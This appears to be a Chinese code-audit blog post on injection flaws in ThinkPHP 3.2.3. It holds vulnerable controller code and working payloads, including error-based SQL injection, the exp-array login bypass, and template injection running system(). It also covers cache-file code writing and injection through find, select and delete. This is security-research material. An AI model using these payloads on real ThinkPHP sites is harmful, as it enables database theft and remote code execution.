<?php

namespace Home\Controller;

use Think\Controller;

class UserController extends Controller {

    public function index(/*$id*/)

    {

// S('a',I('id')); //http://127.0.0.1/tp/index.php/home/index/test?id=%0Aphpinfo%28%29//

//在Temp生成文件   生成的文件名字可到cmd5破解

<?php

//000000000000s:12:"

phpinfo()//";

?>

//       F('key','<?php phpinfo();?>');  14.生成缓存文件,在 runtime/key.php

        $this->display();

/*

//        $name = $_GET['name'];

//        $this->assign($name);            13.模板问题  http://127.0.0.1/tp/index.php/home/user/index?name[_content]=<?php system('type index.php');;?>

//        $this->display('index');       //'TMPL_ENGINE_TYPE'      =>  'php'才有效,默认是Think

//        $map['id'] = 5;

//        $map['_query']='username=afanti&score=10';   //12._query参数可控SELECT * FROM `thinkphp_user` WHERE `id` = 5 AND ( `username` = 'afanti' AND `score` = '10' )

//                $data = M('user')->where($map)->select();

//        dump(data);

//        $map['id'] = I('id');

//        $map['_string'] = 'username='."'".I('username')."'";   //12组合注入  http://127.0.0.1/tp/index.php/home/user/index?id=5&username=afanti   SELECT * FROM `thinkphp_user` WHERE `id` = 5 AND ( username='afanti' )

//        $data = M('user')->where($map)->select();

//        dump(data);

//        $user = M("user");                                //11.setInc注入

//        $user->where('id=5')->setInc('sorce'.I('num'));

//        if(intval($id)>0)

//        {                                   //10、参数传递注入 public\s+function\s+[\w_]+\(\$

//            $data = M('user')->where('id='.$id)->select();  //?id=1) 直接绕过判断

//            dump($data);

//        }

//        $map = array();

//

//      $data = array();

//    $data['user'] = $_POST['username'];

//    $data['pass'] = md5($_POST['password']);             9.exp username[0]=exp&username[1]=aa'or 1=1%23&password=1

//    M('user')->where($data)->find();

//

//      $res = M('member')->where(array('id'=>$_GET['userid']))->count();   9.exp  userid[0]=exp&userid[1]=aaaaaa

//

////        $map['id']=I('id');   //这样exp不可以

//        $map['id'] = $_GET['id'];            //9.exp 注入http://127.0.0.1/tp/index.php/home/user/index?id[0]=exp&id[1]=aaaaaa

//        $data = M('user')->where($map)->select();

//        dump($data);

//        M('user')->count(I('par'));              //8聚合函数 SELECT COUNT(*) AS tp_count FROM `thinkphp_user` LIMIT 1   ?par=*

//                                       //8.query,execute支持原生的sql语句 聚合函数

//$Model->index(I('user'))->select();   //7.索引注入

//        M('user')->comment(I('comment'))->where('1=1')->select();  //6.comment SELECT * FROM `thinkphp_user` WHERE ( 1=1 ) /* 111111111 */    comment=111111111

//        M('user')->where('1=1')->order(array('id'=>I('orderby')))->select(); //5.order,group,having参数可控  SELECT * FROM `thinkphp_user` WHERE ( 1=1 ) ORDER BY `id` asc  ---?orderby=asc

//          M('user')->field(I('id'))->union('select 1 from thinkphp_user')->select();          // 4.->(alias|join|union)\s*\((\$|\$_|I)  用正则查找 alias|join|union参数可控制

//        M('user')->field(I('id'))->where('1=1')->select();    //3.SELECT `id` FROM `thinkphp_user` WHERE ( 1=1 )  id可控

//         M('user')->field(array('id','username'=>I('name')))->select(); //3.field SELECT `id`,`username` AS `uname` FROM `thinkphp_user`  //别名 ?name=uname`a报错

//            M()->table(I('biao'))->where('1=1')->select();  //2.table ?biao=thinkphp_user where 1=1 and 1=(extractvalue(1, concat(0x7e, (select @@version),0x7e)))-- -a 表名必须存在

//          $data = M('user')->where("id=".I('id'))->select(); //1.where后直接直接拼接会产生注入

//          dump($data);

//        $data = I('id','1','intval');

//        echo $data;              //URL_PARAMS_BIND == true

//        echo $id;              //参数绑定 http://127.0.0.1/tp/index.php/home/user/index/id/11111111 传入11111

//        echo "usercontroller";

    }

}




  


 




1.where后直接直接拼接会产生注入


$data = M('user')->where("id=".I('id'))->select();


2.table ?biao=thinkphp_user where 1=1 and 1=(extractvalue(1, concat(0x7e, (select @@version),0x7e)))-- -a 表名必须存在。


M()->table(I('biao'))->where('1=1')->select();


3.


M('user')->field(I('id'))->where('1=1')->select(); //3.SELECT `id` FROM `thinkphp_user` WHERE ( 1=1 ) id可控导致注入


M('user')->field(array('id','username'=>I('name')))->select(); //3.field SELECT `id`,`username` AS `uname` FROM `thinkphp_user` //别名 ?name=uname`a报错


4.->(alias|join|union)\s*\((\$|\$_|I) 用正则查找 alias|join|union参数可控制


M('user')->field(I('id'))->union('select 1 from thinkphp_user')->select();


5.order,group,having参数可控 SELECT * FROM `thinkphp_user` WHERE ( 1=1 ) ORDER BY `id` asc ---?orderby=asc


M('user')->where('1=1')->order(array('id'=>I('orderby')))->select();


6.comment注入 SELECT * FROM `thinkphp_user` WHERE ( 1=1 ) /* 111111111 */ comment=111111111


M('user')->comment(I('comment'))->where('1=1')->select();


7.索引注入


$Model->index(I('user'))->select();


8.query,execute,聚合函数支持原生的sql语句


M('user')->count(I('par')); //聚合函数 SELECT COUNT(*) AS tp_count FROM `thinkphp_user` LIMIT 1 ?par=*


9.exp注入


a.)


$data = array();


$data['user'] = $_POST['username'];


$data['pass'] = md5($_POST['password']); payload: username[0]=exp&username[1]=aa'or 1=1%23&password=1


M('user')->where($data)->find();


b.)


$res = M('member')->where(array('id'=>$_GET['userid']))->count();   payload:  userid[0]=exp&userid[1]=aaaaaa


c.)通过I函数exp注入就不存在了


$res = M('member')->where(array('id'=>$I('userid')))->count();


10、参数传递注入 public\s+function\s+[\w_]+\(\$


public function index(/*$id*/)....


if(intval($id)>0)
{
 $data = M('user')->where('id='.$id)->select();  //?id=1) 直接绕过判断
 dump($data);
}
11.setInc注入


$user = M("user");
$user->where('id=5')->setInc('sorce'.I('num'));


12.组合注入


http://127.0.0.1/tp/index.php/home/user/index?id=5&username=afanti


SELECT * FROM `thinkphp_user` WHERE `id` = 5 AND ( username='afanti' )


$map['id'] = I('id');
$map['_string'] = 'username='."'".I('username')."'"; 
$data = M('user')->where($map)->select();
dump(data);


13、_query参数可控


SELECT * FROM `thinkphp_user` WHERE `id` = 5 AND ( `username` = 'afanti' AND `score` = '10' )


$map['id'] = 5;
$map['_query']='username=afanti&score=10';   //12._query参数可控SELECT * FROM `thinkphp_user` WHERE `id` = 5 AND ( `username` = 'afanti' AND `score` = '10' )
$data = M('user')->where($map)->select();
dump(data);


14、模板问题:http://127.0.0.1/tp/index.php/home/user/index?name[_content]=<?php system('type index.php');;?>


$name = $_GET['name'];
$this->assign($name); 
$this->display('index');       //'TMPL_ENGINE_TYPE'      =>  'php'才有效,默认是Think


15、在runtime/key.php


S('a',I('id')); //http://127.0.0.1/tp/index.php/home/index/test?id=%0Aphpinfo%28%29//
在Temp生成文件   生成的文件名字可到cmd5破解
<?php
//000000000000s:12:"
phpinfo()//";
?>
F('key','<?php phpinfo();?>'); 
        $this->display();


thinkphp3.2.3


跨控制器的方法R:


public function test()
    {
        echo "test";
        echo I('name');


$data = M('user')->where('id=1')->select();
 $a = A('User');
 $a->index();
 R('User/index');       //跨控制器
 dump($data);
    }


16.select、find、delete注入


public function test()

    {

       $id = i('id');

       $res = M('user')->find($id);

       //$res = M('user')->delete($id);

       //$res = M('user')->select($id);

    }
注入的payload:


table:http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[table]=user where%201%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--

alias:http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[alias]=where%201%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--

where: http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[where]=1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--
delete方法注入payload:


where: http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[where]=1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--

alias: http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[where]=1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--

table: http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[table]=user%20where%201%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--&id[where]=1


 
												


											
thinkphp3.2.3代码审计的更多相关文章
	

    
								
  1. 代码审计准备之Thinkphp3
		
    0x01环境部署: 下载: 获取ThinkPHP的方式很多,官方网站(http://thinkphp.cn)是最好的下载和文档获取来源. 官网提供了稳定版本的下载:http://thinkphp.cn ...
    
		
    2. 
						
  2. 代码审计-Thinkphp3框架EXP表达式SQL注入
		
    最近看java框架源码也是看的有点头疼,好多还要复习熟悉 还有好多事没做...慢慢熬. 网上好像还没有特别详细的分析 我来误人子弟吧. 0x01 tp3 中的exp表达式 查询表达式的使用格式: $m ...
    
		
    3. 
						
  3. 代码审计-thinkphp3.2.3框架漏洞sql注入
		
    开始复现审计一下tp3和tp5的框架漏洞,当个练习吧. 涉及注入的方法为where() table() delete()等. 环境 tp3.2.3 : 0x01 注入成因 测试代码: public f ...
    
		
    4. 
						
  4. PHP代码审计05之正则使用不当
		
    前言 根据红日安全写的文章,学习PHP代码审计的第五节内容,题目均来自PHP SECURITY CALENDAR 2017,讲完题目会用一道CTF的题目和实例来加深巩固.这是之前写的,有兴趣可以去看看 ...
    
		
    5. 
						
  5. Thinkphp3分析与审计
		
    0x00 前言: 这篇是去年组内分享的时候给小伙伴写的0基础快速审计tp3系列的文章,主要是对架构做个分析以及审计一些sql注入漏洞~ 现在想想打算放出来,过了一年了,可能里面有一些问题,望看到的大佬 ...
    
		
    6. 
						
  6. thinkphp3.2.3中U()方法和redirect()方法区别
		
    今天博主看3.1的教程,学着3.2,就遇到了这个坑,怎么就是不跳转呢,很纳闷!! 在thinkphp3.1 中 U()方法是可以执行跳转的(看视频教程里面是可以的,博主没有测试过). 但是在think ...
    
		
    7. 
						
  7. thinkphp3.2.3版本文件目录及作用
		
    下载thinkphp3.2.3版本,解压缩后将文件夹名字改为thinkphp,然后放在www目录下,里面的文件夹和文件的名字和作用如下:(前面有Tab健的表示下一级,thinkphp是根目录) //t ...
    
		
    8. 
						
  8. 基于ThinkPHP3的微信平台开发_1
		
    微信公众平台是个好东西,具体的就不说了,我直接说技术>_< 下图为目录结构一览: 微信开发 - 文件目录结构 平台功能: 此次开发的平台是面向多微信公众号.微信多公众号主(下面简称号主)的 ...
    
		
    9. 
						
  9. Thinkphp3.2.3使用Ajax一定注意 数据返回
		
    Thinkphp3.2.3使用Ajax一定注意 数据返回 $data = 'ok'; $this->ajaxReturn($data); 不能直接 echo $data;
    
		
    10. 
		

	


随机推荐
	

    
									
  1. Zookeeper配置要点必看
			
    注意点 zookeeper需要在各个节点的机器上搭建,它的启动也要在各个节点的$ZOOKEEPER_HOME/bin 下启动. 环境搭建 下载安装包并解压. 在$ZOOKEEPER_HOME/conf ...
    
			
    2. 
						
  2. GIT 基础-基础命令
			
    环境 centos7 1.安装 #yum install git 2.创建本地仓库 ( 这里用 /www/git) 这里里有个隐藏的文件夹 ```.git``` 为git仓库的配置文件夹, 不可随意修 ...
    
			
    3. 
						
  3. socket 和 webscoket 的区别
			
    Socket和WebSocket的来源 Socket Socket大致是指在端到端的一个连接中,这两个端叫做Socket.对于IT从业者来说,它往往指的是TCP/IP网络环境中的两个连接端,大多数的A ...
    
			
    4. 
						
  4. hdu 1026   Ignatius and the Princess I    搜索,输出路径
			
    Ignatius and the Princess I Time Limit: 2000/1000 MS (Java/Others)    Memory Limit: 65536/32768 K (J ...
    
			
    5. 
						
  5. EF框架CodeFirst the model backing the 'PModelEntities' context has changed since the database was created. Consider using Code First Migrations to update the database
			
    1.采用code first 做项目时,数据库已经生成,后期修改数据库表结构.再次运行时出现一下问题: Entity Framework : The model backing the 'Produc ...
    
			
    6. 
						
  6. async await的使用
			
    var sleep = function (time) { return new Promise(function (resolve, reject) { setTimeout(function () ...
    
			
    7. 
						
  7. python中单下划线和双下滑线
			
    使用单下划线(_one_underline)开头表示方法不是API的一部分,不要直接访问(虽然语法上访问也没有什么问题). 使用双下划线开头(__two_underlines)开头表示子类不能覆写该方 ...
    
			
    8. 
						
  8. 第九天- 文件操作 r w a 文件复制/修改
			
    文件操作简介:使用python来读写文件是非常简单的操作.我们使用 open() 函数来打开一个文件,获取到文件句柄.然后通过文件句柄就可以进行各种各样的操作了.根据打开⽅方式的不同能够执行的操作也会 ...
    
			
    9. 
						
  9. 利用Metaweblog技术的API接口同步到多个博客网站(详细)
			
    很早就有这个想法:自己有时候会用到多个博客,有些博客在一个网站上写完之后,要同步到其他博客网站,自己只能复制粘贴,感觉特别没意思,复制粘贴的麻木了.一直在想有哪些技术能实现一次写博,多站同步.最近网上 ...
    
			
    10. 
						
  10. unistd.h文件
			
    转载地址:http://baike.baidu.com/link?url=nEyMMFYevs4yoHgQUs2bcfd5WApHUKx0b1ervi7ulR09YhtqC4txmvL1Ce3FS8x ...
    
			
    11.